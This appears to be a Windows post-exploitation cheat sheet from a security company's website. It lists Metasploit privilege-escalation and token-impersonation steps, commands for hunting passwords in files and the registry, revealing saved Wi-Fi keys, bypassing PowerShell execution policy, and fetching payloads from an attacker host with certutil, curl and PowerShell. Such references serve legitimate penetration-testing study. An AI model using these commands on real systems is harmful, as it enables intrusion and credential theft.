top of page

Windows (Post-Exploitation)

Metasploit Shell

Local Exploit Suggester:

*background current session <background>

{
use post/multi/recon/local_exploit_suggester

set session x

run

}

​

*after finding valid exploit

{

use exploit/…

set session x

set lport xxxx

set lhost x.x.x.x run

}

 

Get User: getuid

​

Get Shell: shell

​

Grab tokens with incognito: {

load incognito

list_tokens

impersonate_token “TOKEN”

}

 

Try to Auto-Elevate: getsystem

​

Migrate to Process: migrate -n <process.exe>

System Info

Basic System Info: systeminfo

​

Show System Patches: wmic qfe

​

List Drives: wmic logicaldisk

​

List Drivers: driverquery

​

Show All Users: net user

​

Show Current User: whoami

​

Show Current User Privs: whoami /priv

​

Show Current User Groups: whoami /groups

​

Info On Specific User: net user <user>

​

Users In Localgroup: net localgroup

​

Users In Other Groups: net localgroup <group>

​

Check Processes Status: ps

​

Check Scheduled Tasks: schtasks /query /fo LIST /v

​

Check Service Permissions: wmic service list brief

​

Check for Unquoted Service Paths: wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Networking

Simple Network Info: ipconfig

​

Advanced Network Info: ipconfig /all

​

Arp Table: arp -a

​

Route Table: route print

​

Netstat Ports: netstat /ano

​

Get Wifi AP SSID: netsh wlan show profile

Password Hunting

Search For String: findstr /si <string> *.txt *.<filetype>

​

Search For File: dir /s fileName*

​

Search In Registry (HKCU): reg query HKLM /f password /t REG_SZ /s

​

Search In Registry (HKLM): reg query HKCU /f password /t REG_SZ /s

​

 

Get Wifi Password: netsh wlan show profile <SSID> key=clear

​

Cat Out File: type <file>

​

Dir all files in directory (including hidden): dir /R

​

Currently Stored Credentials: cmdkey /list

​

Check Access To registry: powershell Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

Antivirus and Firewall

Service Control Search: sc query <Antivirus>

​

Quick Service Control Query: sc queryex type= service

​

Show Firewall State (1): netsh advfirewall firewall dump

​

Show Firewall State (2): netsh firewall show state

​

Show Firewall Config: netsh firewall show config

Execution and Uploading Payloads

*run and upload files to temp or user folder which current user has access to. cd c:\\windows\\temp

 

Powershell Execution Policy Bypass: powershell -ep bypass

​

Load PowerShell: load powershell

 

Download File (certutil): certutil -urlcache -f <http://hostip/file> file

​

Download File (wget): wget -o file http://hostip/file

​

Download File (curl): curl.exe -o index.html http://hostip/file

​

Download File (PowerShell): powershell.exe -Command "Invoke-WebRequest -OutFile ./file http://hostip/file"

 

Runas: C:\Windows\System32\runas.exe /user:<CREDS FOUND> /savecred ‘C:\Windows\System32\cmd.exe /c <Command>

​

Restart PC from PowerShell: restart-computer

  • Twitter
  • LinkedIn
  • discord-logo--v2
  • kisspng-github-pages-logo-repository-fork-github-logo-1-magentys-5b69de71b51265

Dragon Eye Intelligence LLC

bottom of page